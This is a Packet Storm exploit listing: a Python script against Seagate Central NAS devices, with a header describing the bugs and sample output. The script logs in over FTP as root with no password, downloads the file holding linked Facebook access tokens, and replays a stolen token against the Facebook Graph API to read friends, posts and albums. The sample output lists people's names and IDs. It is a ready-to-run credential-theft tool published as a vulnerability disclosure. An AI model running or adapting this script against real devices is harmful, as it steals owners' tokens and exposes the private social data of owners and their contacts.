Lucene search

K
packetstormJeremy BrownPACKETSTORM:132162
HistoryJun 04, 2015 - 12:00 a.m.

Seagate Central Remote Facebook Access Token

2015-06-0400:00:00
Jeremy Brown
packetstormsecurity.com
31
`#!/usr/bin/python  
# seagate_central_facebook.py  
#  
# Seagate Central Remote Facebook Access Token Exploit  
#  
# Jeremy Brown [jbrown3264/gmail]  
# May 2015  
#  
# -Synopsis-  
#  
# Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser  
# and this exploit takes advantage of two bugs:  
#  
# 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens  
# 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data  
#  
# -Example-  
#  
# > seagate_fb_accounts.py getaccesstoken 1.2.3.4  
#  
# 'archive_accounts.ser'  
#  
# a:1:{s:8:"facebook";a:1:{s:29:"[email protected]";a:5:{s:7:"service";s:8:"facebook";s:4:  
# "user";s:29:"[email protected]";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t  
# oken";s:186:"CAAxxxxxxxx..."  
# ;}}}  
#  
# Next, try this:  
#  
# > seagate_fb_accounts.py CAAxxxxxxxx... friends  
# server response:  
#  
# {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1  
# 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'  
# : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':  
# .....  
#  
# Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user  
#  
# -Fixes-  
#  
# Seagate scheduled updates to go live on April 28th, 2015.  
#  
# Tested version: 2014.0410.0026-F  
#  
  
import sys  
import json  
from urllib import request # python3  
from ftplib import FTP  
  
fb_url = "https://graph.facebook.com"  
fb_filename = "archive_accounts.ser"  
  
def getaccesstoken(host):  
try:  
ftp = FTP(host)  
ftp.login("root")  
ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)  
ftp.close()  
  
except Exception as error:  
print("Error: %s" % error)  
return  
  
try:  
with open(fb_filename, 'r') as file:  
data = file.read()  
  
except Exception as error:  
print("Error: %s" % error)  
return  
  
print("\n'%s'\n\n%s\n\n" % (fb_filename, data))  
  
return  
  
def main():  
if(len(sys.argv) < 2):  
print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])  
print("scopes: albums feed friends likes picture posts television")  
return  
  
if(sys.argv[1] == "getaccesstoken"):  
if(len(sys.argv) == 3):  
host = sys.argv[2]  
  
res = getaccesstoken(host)  
  
else:  
print("Error: need host to retrieve access token file\n")  
return  
  
else:  
key = sys.argv[1]  
  
if(len(sys.argv) == 3):  
scope = sys.argv[2]  
else:  
scope = ""  
  
try:  
response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()  
  
except Exception as error:  
print("Error: %s" % error)  
return  
  
data = json.loads(response.decode('utf-8'))  
  
print("server response:\n\n%s\n" % data)  
  
return  
  
if __name__ == "__main__":  
main()  
`